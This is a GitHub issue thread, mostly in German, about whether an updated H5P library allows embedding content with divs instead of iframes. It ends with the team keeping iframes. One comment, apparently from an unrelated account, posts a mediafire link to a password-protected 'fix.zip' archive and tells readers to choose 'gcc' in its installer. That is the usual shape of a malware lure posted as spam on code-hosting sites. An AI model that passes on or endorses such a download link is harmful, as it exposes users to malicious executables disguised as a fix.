### ISSUE TITLE
[Research] - H5P Aktualisierte Library (div vs. iframe)

### ISSUE THREAD

**Issue by splican** [ProjektAdLer/2D_3D_AdLer#1053]
**Problemstellung**

Die aktualisierte H5P Library ermöglicht es uns H5Ps auf andere Art und Weise darzustellen. Dazu verändert die Aktualisierung die Vorraussetzungen, der vorherigen Versionen wodurch neu überprüft werden muss, welche H5Ps funktionieren.

Umgebung, in der H5Ps probiert werden können (ohne Engine Overhead):
https://cloud.projekt-adler.eu/apps/files/files/170301?dir=/AdLer/Teams/Product%20Owner/H5PValidator

**Akzeptanzkriterien**

- [x] Research zu div Einbindung erfolgt
- [x] Entscheidung ob iframe oder div Einbindung

**Definition of Ready**

- [x] User Story ist klein genug für Sprint
- [x] User Story ist für jeden Beteiligten klar verständlich
- [x] User Story Aufwand ist geschätzt
- [x] User Story hat Akzeptanzkriterien

**Definition of Done**

- [x] Alle Akzeptanzkriterien sind erfüllt
- [x] Researchergebnisse sind als ZenHub Kommentar dokumentiert (Wiki / MuralBoard / etc.)
- [x] Die Realisierung wurde erfolgreich durch den Product Owner abgenommen
- [x] [Optional] Dokumentation des Vorgehens oder externer Quellen wurde angelegt (Zenhub Kommentar)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by splican** [comment]
Hey team! Please [add your planning poker estimate](https://app.zenhub.com/workspaces/2D3DAdLerWorkspace-61b878c8596aef0010898ddd/issues/ProjektAdLer/2D_3D_AdLer/1053?planning-poker) with Zenhub @AdLer-Lukas @DerKatsche @Grunick @Lizardguard @mountler

**Comment by mountler** [comment]
Aufgrund von einem Missverständnis gab es nie die Möglichkeit iframes ohne größen Aufwand durch divs zu ersetzen. H5P-Elemente werden weiterhin in iframes dargestellt.
